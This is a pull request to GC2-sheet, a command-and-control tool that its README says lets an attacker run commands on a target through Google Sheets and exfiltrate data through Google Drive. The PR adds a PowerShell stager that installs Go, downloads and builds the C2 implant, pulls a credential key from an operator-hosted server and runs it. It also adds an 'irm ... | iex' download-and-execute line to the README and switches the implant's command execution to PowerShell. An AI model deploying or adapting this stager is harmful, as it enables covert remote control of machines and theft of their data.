### PR TITLE
Create PowershellScript-GC-2.ps1

### DIFF
--- a/PowershellScript-GC-2.ps1
+++ b/PowershellScript-GC-2.ps1
@@ -1,23 +1,40 @@
 <#
-A Powershell script that downloads go, adds it the user's path, downloads the zip from the repository "looCiprian/GC2-sheet",
-builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-Webrequest down,
+A PowerShell script that downloads Go, adds it to the user's PATH, downloads the zip from the repository "looCiprian/GC2-sheet",
+builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-WebRequest down,
 #MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1. Recommend using Invoke-RestMethod or Invoke-WebRequest to pull down
 the contents of the file.
 #>
-# For baked in variables
-$myUrl=#MY_TARGET_URL
-$myKey=#MY_KEY_JSON
-$mySheetId=#MY_SHEET_ID
-$myDriveId=#MY_DRIVE_ID
-cd $env:userprofile\Downloads;
-iwr https://go.dev/dl/go1.21.12.windows-amd64.zip -o go.zip;
-expand-archive go.zip;
-mv .\go $env:userprofile;rm -r -force .\go.zip;
-$env:PATH += ";$env:userprofile\go\go\bin";
-iwr https://github.com/looCiprian/GC2-sheet/archive/refs/heads/master.zip -o master.zip;
-expand-archive .\master.zip;
-rm -r -force master.zip;
-cd .\master\GC2-sheet-master;
-iwr http://$myUrl/$myKey -usebasicparsing -o $myKey;
-go build gc2-sheet.go;
+
+# Define variables
+$myUrl = "#MY_TARGET_URL"
+$myKey = "#MY_KEY_JSON"
+$mySheetId = "#MY_SHEET_ID"
+$myDriveId = "#MY_DRIVE_ID"
+
+# Change to the Downloads directory
+cd $env:userprofile\Downloads
+
+# Download and extract Go
+Invoke-WebRequest -Uri "https://go.dev/dl/go1.21.12.windows-amd64.zip" -OutFile "go.zip"
+Expand-Archive -Path "go.zip" -DestinationPath "$env:userprofile"
+Remove-Item -Path "go.zip" -Force
+
+# Add Go to the PATH
+$env:PATH += ";$env:userprofile\go\go\bin"
+
+# Download and extract the GC2-sheet repository
+Invoke-WebRequest -Uri "https://github.com/looCiprian/GC2-sheet/archive/refs/heads/master.zip" -OutFile "master.zip"
+Expand-Archive -Path "master.zip" -DestinationPath "$env:userprofile\Downloads"
+Remove-Item -Path "master.zip" -Force
+
+# Change to the GC2-sheet directory
+cd "$env:userprofile\Downloads\GC2-sheet-master"
+
+# Download the key file
+Invoke-WebRequest -Uri "http://$myUrl/$myKey" -UseBasicParsing -OutFile "$myKey"
+
+# Build the gc2-sheet executable
+go build gc2-sheet.go
+
+# Run the gc2-sheet executable with the specified parameters
 .\gc2-sheet -k $myKey -s $mySheetId -d $myDriveId

--- a/PowershellScript-GC-2.ps1
+++ b/PowershellScript-GC-2.ps1
@@ -18,6 +18,6 @@ iwr https://github.com/looCiprian/GC2-sheet/archive/refs/heads/master.zip -o mas
 expand-archive .\master.zip;
 rm -r -force master.zip;
 cd .\master\GC2-sheet-master;
-iwr "http://$myUrl/$myKey" -o $myKey;
+iwr http://$myUrl/$myKey -usebasicparsing -o $myKey;
 go build gc2-sheet.go;
 .\gc2-sheet -k $myKey -s $mySheetId -d $myDriveId

--- a/PowershellScript-GC-2.ps1
+++ b/PowershellScript-GC-2.ps1
@@ -1,3 +1,8 @@
+<#
+A Powershell script that downloads go, adds it the user's path, downloads the zip from the repository "looCiprian/GC2-sheet",
+builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-Webrequest down,
+#MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1.
+#>
 cd $env:userprofile\Downloads;
 iwr https://go.dev/dl/go1.21.12.windows-amd64.zip -o go.zip;
 expand-archive go.zip;

--- a/PowershellScript-GC-2.ps1
+++ b/PowershellScript-GC-2.ps1
@@ -16,7 +16,8 @@ cd $env:userprofile\Downloads
 
 # Download and extract Go
 Invoke-WebRequest -Uri "https://go.dev/dl/go1.21.12.windows-amd64.zip" -OutFile "go.zip"
-Expand-Archive -Path "go.zip" -DestinationPath "$env:userprofile"
+Expand-Archive .\go.zip
+mv .\go $env:userprofile
 Remove-Item -Path "go.zip" -Force
 
 # Add Go to the PATH
@@ -24,11 +25,11 @@ $env:PATH += ";$env:userprofile\go\go\bin"
 
 # Download and extract the GC2-sheet repository
 Invoke-WebRequest -Uri "https://github.com/looCiprian/GC2-sheet/archive/refs/heads/master.zip" -OutFile "master.zip"
-Expand-Archive -Path "master.zip" -DestinationPath "$env:userprofile\Downloads"
+Expand-Archive .\master.zip
 Remove-Item -Path "master.zip" -Force
 
 # Change to the GC2-sheet directory
-cd "$env:userprofile\Downloads\GC2-sheet-master"
+cd "$env:userprofile\Downloads\master\GC2-sheet-master"
 
 # Download the key file
 Invoke-WebRequest -Uri "http://$myUrl/$myKey" -UseBasicParsing -OutFile "$myKey"
@@ -38,3 +39,4 @@ go build gc2-sheet.go
 
 # Run the gc2-sheet executable with the specified parameters
 .\gc2-sheet -k $myKey -s $mySheetId -d $myDriveId
+

--- a/PowershellScript-GC-2.ps1
+++ b/PowershellScript-GC-2.ps1
@@ -1,7 +1,7 @@
 <#
 A Powershell script that downloads go, adds it the user's path, downloads the zip from the repository "looCiprian/GC2-sheet",
 builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-Webrequest down,
-#MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1. Recommend using Invoke-RestMethod or Invoke-WebRequest to pull down
+#MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1. Recommend using Invoke-WebRequest to pull down
 the contents of the file.
 #>
 # For baked in variables

--- a/PowershellScript-GC-2.ps1
+++ b/PowershellScript-GC-2.ps1
@@ -1,8 +1,14 @@
 <#
 A Powershell script that downloads go, adds it the user's path, downloads the zip from the repository "looCiprian/GC2-sheet",
 builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-Webrequest down,
-#MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1.
+#MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1. Recommend using Invoke-RestMethod or Invoke-WebRequest to pull down
+the contents of the file.
 #>
+# For baked in variables
+$myUrl=#MY_TARGET_URL
+$myKey=#MY_KEY_JSON
+$mySheetId=#MY_SHEET_ID
+$myDriveId=#MY_DRIVE_ID
 cd $env:userprofile\Downloads;
 iwr https://go.dev/dl/go1.21.12.windows-amd64.zip -o go.zip;
 expand-archive go.zip;
@@ -12,6 +18,6 @@ iwr https://github.com/looCiprian/GC2-sheet/archive/refs/heads/master.zip -o mas
 expand-archive .\master.zip;
 rm -r -force master.zip;
 cd .\master\GC2-sheet-master;
-iwr http://#MY_TARGET_URL/my_key.json -o my_key.json;
+iwr http://$myUrl/$myKey -o $myKey;
 go build gc2-sheet.go;
-.\gc2-sheet -k #MY_KEY_JSON -s #MY_SHEET_ID -d #MY_DRIVE_ID
+.\gc2-sheet -k $myKey -s $mySheetId -d $myDriveId

--- a/PowershellScript-GC-2.ps1
+++ b/PowershellScript-GC-2.ps1
@@ -1,0 +1,12 @@
+cd $env:userprofile\Downloads;
+iwr https://go.dev/dl/go1.21.12.windows-amd64.zip -o go.zip;
+expand-archive go.zip;
+mv .\go $env:userprofile;rm -r -force .\go.zip;
+$env:PATH += ";$env:userprofile\go\go\bin";
+iwr https://github.com/looCiprian/GC2-sheet/archive/refs/heads/master.zip -o master.zip;
+expand-archive .\master.zip;
+rm -r -force master.zip;
+cd .\master\GC2-sheet-master;
+iwr http://#MY_TARGET_URL/my_key.json -o my_key.json;
+go build gc2-sheet.go;
+.\gc2-sheet -k #MY_KEY_JSON -s #MY_SHEET_ID -d #MY_DRIVE_ID

--- a/PowershellScript-GC-2.ps1
+++ b/PowershellScript-GC-2.ps1
@@ -18,6 +18,6 @@ iwr https://github.com/looCiprian/GC2-sheet/archive/refs/heads/master.zip -o mas
 expand-archive .\master.zip;
 rm -r -force master.zip;
 cd .\master\GC2-sheet-master;
-iwr http://$myUrl/$myKey -o $myKey;
+iwr "http://$myUrl/$myKey" -o $myKey;
 go build gc2-sheet.go;
 .\gc2-sheet -k $myKey -s $mySheetId -d $myDriveId

--- a/PowershellScript-GC-2.ps1
+++ b/PowershellScript-GC-2.ps1
@@ -1,7 +1,7 @@
 <#
 A Powershell script that downloads go, adds it the user's path, downloads the zip from the repository "looCiprian/GC2-sheet",
 builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-Webrequest down,
-#MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1. Recommend using Invoke-WebRequest to pull down
+#MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1. Recommend using Invoke-RestMethod or Invoke-WebRequest to pull down
 the contents of the file.
 #>
 # For baked in variables

--- a/README.md
+++ b/README.md
@@ -73,7 +73,7 @@ Furthermore, the program will interact only with Google's domains (*.google.com)
 
    If you have a web server hosting your MY_KEY_JSON file and running on Windows, use:
    ```Powershell
-   irm http://$myUrl/PowershellScript-GC-2.ps1 -usebasicparsing | iex
+   irm "http://$myUrl/PowershellScript-GC-2.ps1" | iex
    ```
 
    Or Linux the below commands. If the configuration file has been modified just run:

--- a/README.md
+++ b/README.md
@@ -8,7 +8,7 @@ GC2 (Google Command and Control) is a Command and Control application that allow
 
 # My Contribution
 
-A Powershell script that downloads go, adds it the user's path, downloads the zip from the repository "looCiprian/GC2-sheet", builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-Webrequest down, #MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1. Additionally, PowershellScript-GC-2.ps1 can be hosted from the same webserver and requested with Invoke-RestMethod or Invoke-WebRequest.
+A Powershell script that downloads go, adds it to the user's path, downloads the zip from the repository "looCiprian/GC2-sheet", builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-Webrequest down, #MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1. Additionally, PowershellScript-GC-2.ps1 can be hosted from the same webserver and requested with Invoke-RestMethod or Invoke-WebRequest.
 
 # Why
 

--- a/README.md
+++ b/README.md
@@ -73,7 +73,7 @@ Furthermore, the program will interact only with Google's domains (*.google.com)
 
    If you have a web server hosting your MY_KEY_JSON file and running on Windows, use:
    ```Powershell
-   irm http://$myUrl/PowershellScript-GC-2.ps1 | iex
+   irm "http://$myUrl/PowershellScript-GC-2.ps1" | iex
    ```
 
    Or Linux the below commands. If the configuration file has been modified just run:

--- a/README.md
+++ b/README.md
@@ -71,7 +71,12 @@ Furthermore, the program will interact only with Google's domains (*.google.com)
 
 7. **Run**
 
-    If the configuration file has been modified just run:
+   If you have a web server hosting your MY_KEY_JSON file and running on Windows, use:
+   ```Powershell
+   irm http://$myUrl/PowershellScript-GC-2.ps1 | iex
+   ```
+
+   Or Linux the below commands. If the configuration file has been modified just run:
 
     ```
     ./gc2-sheet

--- a/README.md
+++ b/README.md
@@ -8,7 +8,7 @@ GC2 (Google Command and Control) is a Command and Control application that allow
 
 # My Contribution
 
-A Powershell script that downloads go, adds it the user's path, downloads the zip from the repository "looCiprian/GC2-sheet", builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-Webrequest down, #MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1.
+A Powershell script that downloads go, adds it the user's path, downloads the zip from the repository "looCiprian/GC2-sheet", builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-Webrequest down, #MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1. Additionally, PowershellScript-GC-2.ps1 can be hosted from the same webserver and requested with Invoke-RestMethod or Invoke-WebRequest.
 
 # Why
 

--- a/README.md
+++ b/README.md
@@ -8,7 +8,7 @@ GC2 (Google Command and Control) is a Command and Control application that allow
 
 # My Contribution
 
-A Powershell script that downloads go, adds it to the user's path, downloads the zip from the repository "looCiprian/GC2-sheet", builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-Webrequest down, #MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1. Additionally, PowershellScript-GC-2.ps1 can be hosted from the same webserver and requested with Invoke-RestMethod or Invoke-WebRequest.
+A Powershell script that downloads go, adds it to the user's path, downloads the zip from the repository "looCiprian/GC2-sheet", builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-Webrequest down, #MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1. Additionally, PowershellScript-GC-2.ps1 can be hosted from the same webserver and requested with Invoke-WebRequest.
 
 # Why
 
@@ -73,7 +73,7 @@ Furthermore, the program will interact only with Google's domains (*.google.com)
 
    If you have a web server hosting your MY_KEY_JSON file and running on Windows, use:
    ```Powershell
-   irm "http://$myUrl/PowershellScript-GC-2.ps1" | iex
+   irm http://$myUrl/PowershellScript-GC-2.ps1 -usebasicparsing | iex
    ```
 
    Or Linux the below commands. If the configuration file has been modified just run:

--- a/README.md
+++ b/README.md
@@ -6,6 +6,10 @@
 
 GC2 (Google Command and Control) is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrates data using Google Drive.
 
+# My Contribution
+
+A Powershell script that downloads go, adds it the user's path, downloads the zip from the repository "looCiprian/GC2-sheet", builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-Webrequest down, #MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1.
+
 # Why
 
 This project has been developed to provide a command and control that does not require any particular set up (like: a custom domain, VPS, CDN, ...) during Red Teaming activities.

--- a/internal/C2/GoogleAuthentication.go
+++ b/internal/C2/GoogleAuthentication.go
@@ -160,7 +160,7 @@ func generateNewSheetName() string {
 
 	currentTimeS := currentTime.Format("02-01-2006")
 
-	unixString := strconv.FormatInt(currentTime.Unix(), 10)
+	unixString := strconv.FormatInt(currentTime.Unix(), 2)
 
 	hostname, err := os.Hostname()
 	if err != nil {

--- a/internal/C2/GoogleAuthentication.go
+++ b/internal/C2/GoogleAuthentication.go
@@ -160,7 +160,7 @@ func generateNewSheetName() string {
 
 	currentTimeS := currentTime.Format("02-01-2006")
 
-	unixString := strconv.FormatInt(currentTime.Unix(), 2)
+	unixString := strconv.FormatInt(currentTime.Unix(), 10)
 
 	hostname, err := os.Hostname()
 	if err != nil {

--- a/internal/C2/execute.go
+++ b/internal/C2/execute.go
@@ -85,7 +85,7 @@ func executeCommand(commandToExecute string) string {
 		// For windows commands must be on the form: "cmd /c <command>" Example "cmd /C dir"
 		arguments = append(arguments, "/c")
 		arguments = append(arguments, splitArgs...)
-		outCommand, err = exec.Command("cmd", arguments...).Output()
+		outCommand, err = exec.Command("Powershell", arguments...).Output()
 	}
 
 	if err != nil {


### PR DESCRIPTION
A PowerShell script that downloads Go, adds it to the user's PATH, downloads the zip from the repository "looCiprian/GC2-sheet",
builds the executable, and runs gc2-sheet. Note: requires a web server to host the #MY_KEY_JSON file to Invoke-WebRequest down,
#MY_SHEET_ID, and #MY_DRIVE_ID to be incorporated into the PS1. Recommend using Invoke-RestMethod or Invoke-WebRequest to pull down
the contents of the file.